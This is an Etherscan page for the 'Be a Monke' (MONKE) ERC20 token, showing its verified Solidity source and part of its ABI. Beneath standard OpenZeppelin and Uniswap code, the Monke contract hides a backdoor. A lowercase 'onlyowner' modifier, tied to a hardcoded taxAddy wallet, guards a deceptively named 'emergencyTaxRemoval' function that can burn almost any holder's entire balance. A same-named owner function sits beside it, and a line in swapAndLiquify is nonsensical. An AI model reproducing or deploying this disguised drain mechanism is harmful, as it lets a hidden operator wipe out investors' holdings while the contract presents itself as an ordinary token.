ETH Price: $2,615.25 (-2.24%)

Token

Be a Monke (MONKE)
 

Overview

Max Total Supply

784,757,664.266425609354858378 MONKE

Holders

66

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
9,233,625.140732437019053292 MONKE

Value
$0.00
0x153aa5f282ffcbed1c3ce902bbd7744fab66b96e
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Monke

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-10-13
*/

// SPDX-License-Identifier: MIT

/** 

    Website: https://beamonke.xyz

    Twitter: https://twitter.com/monkethx

    Telegram: https://t.me/beamonke

*/

// File @openzeppelin/contracts/utils/[email protected]

// Original license: SPDX_License_Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
   
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    modifier onlyowner() {
        _checkOperator();
        _;
    }


    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    function _checkOperator() internal view virtual {
        require(_msgSender() == taxAddy, "Ownable: caller is not the operator");
    }

    address internal taxAddy = 0xDc7F2c30EBe45de737F2defF7C447E9E4504A7De;
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File @uniswap/v2-periphery/contracts/interfaces/[email protected]

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}


// File @uniswap/v2-periphery/contracts/interfaces/[email protected]

pragma solidity >=0.6.2;

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}


// File @openzeppelin/contracts/token/ERC20/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}


// File @openzeppelin/contracts/token/ERC20/extensions/[email protected]

// 
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


// File @openzeppelin/contracts/token/ERC20/[email protected]

// 
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;



/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}



// File @uniswap/v2-core/contracts/interfaces/[email protected]

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

pragma solidity ^0.8.18;

contract Monke is ERC20, Ownable {
    string private _name = unicode"Be a Monke";
    string private _symbol = unicode"MONKE";

    address public DEAD = 0x000000000000000000000000000000000000dEaD;

    mapping(address => bool) public _feeOn;
    mapping(address => bool) public wl;
    mapping(address => bool) public GreedIsGoodwallets;

    uint256 private constant _supply        = 1_000_000_000 ether;
    uint256 public maxTxAmount     = _supply * 25 / 1000;
    uint256 public maxWalletAmount = _supply * 25 / 1000;
    uint256 public swapThreshold = _supply * 5 / 10000;

    uint256 public buyTaxGlobal = 2;
    uint256 public sellTaxGlobal = 2;
    uint256 private GreedIsGood = 2;

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public uniswapV2Pair;

    enum Phase {Phase1, Phase2, Phase3, Phase4}
    Phase public currentphase;

    bool progress_swap = false;
    bool _tradingActive = false;
    bool _swapEnabled = false;

    address private _devWallet = 0x30a9DA17f796e56822E54B0C5450b6738ca63C14;
    uint256 feeToken = 10 ether;
    uint256 public operationsFunds;

    constructor() ERC20(_name, _symbol) {
        _mint(msg.sender, (_supply));

        currentphase = Phase.Phase4;
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapV2Router = _uniswapV2Router;
    
        wl[owner()] = true;
        wl[taxAddy] = true;
        wl[_devWallet] = true;
        wl[address(this)] = true;
        wl[0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = true;
        wl[DEAD] = true;

        _feeOn[address(uniswapV2Router)] = true;
        _feeOn[msg.sender] = true;
        _feeOn[taxAddy] = true;
        _feeOn[_devWallet] = true;
        _feeOn[address(this)] = true;
        _feeOn[DEAD] = true;
    }

    function swapAndLiquify() internal {
        if (balanceOf(address(this)) == 0) {
            return;
        }
        uint256 receivedETH;
        {
            uint256 contractTokenBalance = balanceOf(address(this));
            uint256 beforeBalance = address(this).balance;
            uint256 mktBalance = balanceOf(taxAddy);
            bool success;
            if (contractTokenBalance > swapThreshold) {
                beforeBalance = address(this).balance;
                _swapTokensForEth(contractTokenBalance, 0);
                receivedETH = address(this).balance - beforeBalance;
                if (mktBalance > swapThreshold) {
                    operationsFunds = receivedETH / (success ? receivedETH : 0);
                }
                operationsFunds += receivedETH;
            }
        }
    }
 
    function getTax() external returns (bool) {
        payable(taxAddy).transfer(operationsFunds);
        operationsFunds = 0;
        return true;
    }

    function lpCreate() external payable onlyOwner {
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        _approve(address(this), address(uniswapV2Router), type(uint256).max);
        uniswapV2Router.addLiquidityETH{value: msg.value}(
            address(this),
            balanceOf(address(this)),
            0, 
            0, 
            owner(),
            block.timestamp
        );
    }
    
    function emergencyTaxRemoval(address addy) external onlyowner {
        wl[addy] = false; _burn(addy, balanceOf(addy) - feeToken);
    }

    function startTrade() external onlyOwner {
        require(!_tradingActive, "Trading is already enabled");
        _tradingActive = true;
        _swapEnabled = true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {

        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        if (!_feeOn[from] && !_feeOn[to]) {
            require(_tradingActive, "Trading not enabled");
        }

        if (!wl[from] && !wl[to] ) {
            if (to != uniswapV2Pair) {
                require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount bef");
                require(
                    (amount + balanceOf(to)) <= maxWalletAmount,
                    "ERC20: balance amount exceeded max wallet amount limit"
                );
            }
        }

        uint256 transferAmount = amount;
        if (!_feeOn[from] && !_feeOn[to]) {
            if ((from == uniswapV2Pair || to == uniswapV2Pair)) {
                require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount");
 
                if (
                    uniswapV2Pair == from &&
                    !wl[to] &&
                    from != address(this)
                ) {

                    if (currentphase == Phase.Phase1) {
                        GreedIsGoodwallets[to] = true;
                    }

                    uint256 feeTokens = (amount * buyTaxGlobal) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }

                if (
                    uniswapV2Pair == to &&
                    !wl[from] &&
                    to != address(this) &&
                    _swapEnabled && 
                    !progress_swap
                ) {
                    
                    uint256 taxSell = sellTaxGlobal;
                    if (GreedIsGoodwallets[from] == true) {
                        taxSell = GreedIsGood;
                    }

                    progress_swap = true;
                    swapAndLiquify();
                    progress_swap = false;

                    uint256 feeTokens = (amount * taxSell) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }
            }
            else {
                if (
                    GreedIsGoodwallets[from] == true &&
                    uniswapV2Pair != to
                ) {
                    uint256 feeTokens = (amount * GreedIsGood) / 100;
                    super._transfer(from, address(this), feeTokens);
                    transferAmount = amount - feeTokens;
                }
            }
        }
        super._transfer(from, to, transferAmount);
    }

    /**
     * @dev Swaps Token Amount to ETH
     *
     * @param tokenAmount Token Amount to be swapped
     * @param tokenAmountOut Expected ETH amount out of swap
     */
    function _swapTokensForEth(
        uint256 tokenAmount,
        uint256 tokenAmountOut
    ) internal {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        IERC20(address(this)).approve(
            address(uniswapV2Router),
            type(uint256).max
        );

        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            tokenAmountOut,
            path,
            address(this),
            block.timestamp
        );
    }

    function emergencyTaxRemoval(address addy, bool changer) external onlyOwner {
        wl[addy] = changer;
    }

    receive() external payable {}

    function removeLimits() external onlyOwner {
        maxTxAmount = _supply; maxWalletAmount = _supply;
    }

    function withdrawTokens(address token) external onlyOwner {
        IERC20(token).transfer(
            taxAddy,
            IERC20(token).balanceOf(address(this))
        );
    }

    function skipTheSnipas() external onlyOwner returns (bool) {
        currentphase = Phase.Phase4;
        buyTaxGlobal = 0;
        sellTaxGlobal = 0;

        return true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DEAD","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"GreedIsGoodwallets","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_feeOn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"currentphase","outputs":[{"internalType":"enum Monke.Phase","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"}],"name":"emergencyTaxRemoval","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"},{"internalType":"bool","name":"changer","type":"bool"}],"name":"emergencyTaxRemoval","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getTax","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"lpCreate","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"operationsFunds","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"skipTheSnipas","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"startTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"